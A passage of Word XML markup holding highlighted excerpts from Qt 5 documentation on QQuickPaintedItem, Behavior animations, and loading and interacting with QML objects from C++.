      <w:bookmarkEnd w:id="2606"/>
      <w:r w:rsidRPr="001945D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Custom QPainter Items</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2607"/>
      <w:bookmarkEnd w:id="2608"/>
      <w:bookmarkEnd w:id="2609"/>
      <w:bookmarkEnd w:id="2610"/>
    </w:p>
    <w:p w:rsidR="0069433A" w:rsidRPr="0069433A" w:rsidRDefault="0069433A" w:rsidP="0069433A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:hyperlink r:id="rId2885" w:history="1">
        <w:r w:rsidRPr="0069433A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> provides a subclass, </w:t>
      </w:r>
      <w:hyperlink r:id="rId2886" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickPaintedItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which allows the users to render content using </w:t>
      </w:r>
      <w:hyperlink r:id="rId2887" w:history="1">
        <w:r w:rsidRPr="0069433A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QPainter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0069433A" w:rsidRPr="0069433A" w:rsidRDefault="0069433A" w:rsidP="0069433A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Warning:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> Using </w:t>
      </w:r>
      <w:hyperlink r:id="rId2888" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickPaintedItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> uses an indirect 2D surface to render its content, either using software rasterization or using an OpenGL framebuffer object (FBO), so the rendering is a two-step operation. First rasterize the surface, then draw the surface. Using scene graph API directly is always significantly faster.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0069433A" w:rsidRPr="001945D5" w:rsidRDefault="0069433A" w:rsidP="001945D5">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2611" w:name="behavior-animations"/>
      <w:bookmarkStart w:id="2612" w:name="_Toc483001102"/>
      <w:bookmarkStart w:id="2613" w:name="_Toc483004071"/>
      <w:bookmarkStart w:id="2614" w:name="_Toc483604435"/>
      <w:bookmarkStart w:id="2615" w:name="_Toc483605655"/>
      <w:bookmarkEnd w:id="2611"/>
      <w:r w:rsidRPr="001945D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Behavior Animations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2612"/>
      <w:bookmarkEnd w:id="2613"/>
      <w:bookmarkEnd w:id="2614"/>
      <w:bookmarkEnd w:id="2615"/>
    </w:p>
    <w:p w:rsidR="0069433A" w:rsidRPr="0069433A" w:rsidRDefault="0069433A" w:rsidP="0069433A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If your Item uses the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2889" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Behavior</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> type to define animations for property changes, you should always use either </w:t>
      </w:r>
      <w:hyperlink r:id="rId2890" w:anchor="setProperty" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject::setProperty</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(), QQmlProperty(), or </w:t>
      </w:r>
      <w:hyperlink r:id="rId2891" w:anchor="write" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QMetaProperty::write</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">() when you need </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>to modify those properties from C++.</w:t>
      </w:r>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This en</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sures that the QML engine knows about the property change.</w:t>
      </w:r>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Otherwise, the engine won't be able to carry out your requested animation.</w:t>
      </w:r>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note that these functions incur a slight performance penalty.</w:t>
      </w:r>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> For more details, see </w:t>
      </w:r>
      <w:hyperlink r:id="rId2892" w:anchor="accessing-members-of-a-qml-object-type-from-c" w:history="1">
        <w:r w:rsidRPr="0069433A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Accessing Members of a QML Object Type from C++</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77D11" w:rsidRDefault="00490E7E" w:rsidP="00BB63D0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2893" w:anchor="accessing-members-of-a-qml-object-type-from-c" w:history="1">
        <w:r w:rsidR="00CA76F2" w:rsidRPr="008F7E48">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtqml-cppintegration-interactqmlfromcpp.html#accessing-members-of-a-qml-object-type-from-c</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CA76F2" w:rsidRPr="00CA76F2" w:rsidRDefault="00CA76F2" w:rsidP="001945D5">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2616" w:name="_Toc483001103"/>
      <w:bookmarkStart w:id="2617" w:name="_Toc483004072"/>
      <w:bookmarkStart w:id="2618" w:name="_Toc483604436"/>
      <w:bookmarkStart w:id="2619" w:name="_Toc483605656"/>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Interacting with QML Objects from C++</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2616"/>
      <w:bookmarkEnd w:id="2617"/>
      <w:bookmarkEnd w:id="2618"/>
      <w:bookmarkEnd w:id="2619"/>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A06108">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>All QML object types are</w:t>
      </w:r>
      <w:r w:rsidRPr="00A06108">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2894" w:history="1">
        <w:r w:rsidRPr="00A06108">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A06108">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-derived types</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A06108">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>whether they are internally implemented by the engine or</w:t>
      </w:r>
      <w:r w:rsidRPr="00A06108">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2895" w:history="1">
        <w:r w:rsidRPr="00A06108">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>defined by third-party sources</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This means the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A06108">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML engine can use the Qt</w:t>
      </w:r>
      <w:r w:rsidR="001945D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2896" w:history="1">
        <w:r w:rsidRPr="00A06108">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Meta Object System</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001945D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A06108">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to dynamically instantiate any QML object type and inspect the created objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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A06108">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This is useful for creating QML objects from C++ code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, whether to display a QML object that can be visually rendered, or to integrate non-visual QML object data into a C++ application. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A06108">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Once a QML object is created, it can be inspected from C++ in order to read and write to properties, invoke methods and receive signal notifications</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA76F2" w:rsidRPr="00CA76F2" w:rsidRDefault="00CA76F2" w:rsidP="001945D5">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2620" w:name="loading-qml-objects-from-c"/>
      <w:bookmarkStart w:id="2621" w:name="_Toc483001104"/>
      <w:bookmarkStart w:id="2622" w:name="_Toc483004073"/>
      <w:bookmarkStart w:id="2623" w:name="_Toc483604437"/>
      <w:bookmarkStart w:id="2624" w:name="_Toc483605657"/>
      <w:bookmarkEnd w:id="2620"/>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Loading QML Objects from C++</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2621"/>
      <w:bookmarkEnd w:id="2622"/>
      <w:bookmarkEnd w:id="2623"/>
      <w:bookmarkEnd w:id="2624"/>
    </w:p>
    <w:p w:rsidR="00CA76F2" w:rsidRDefault="00CA76F2" w:rsidP="00CA76F2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00A06108">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML document can be loaded with</w:t>
      </w:r>
      <w:r w:rsidR="001945D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2897" w:history="1">
        <w:r w:rsidRPr="00A06108">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlComponent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001945D5">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:i/>
          <w:color w:val="17A81A"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A06108">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidR="001945D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2898" w:history="1">
        <w:r w:rsidRPr="00A06108">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001945D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2899" w:history="1">
        <w:r w:rsidRPr="00A06108">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlComponent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001945D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A06108">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>loads a QML document as a C++ object that can then be modified from C++ code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001945D5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
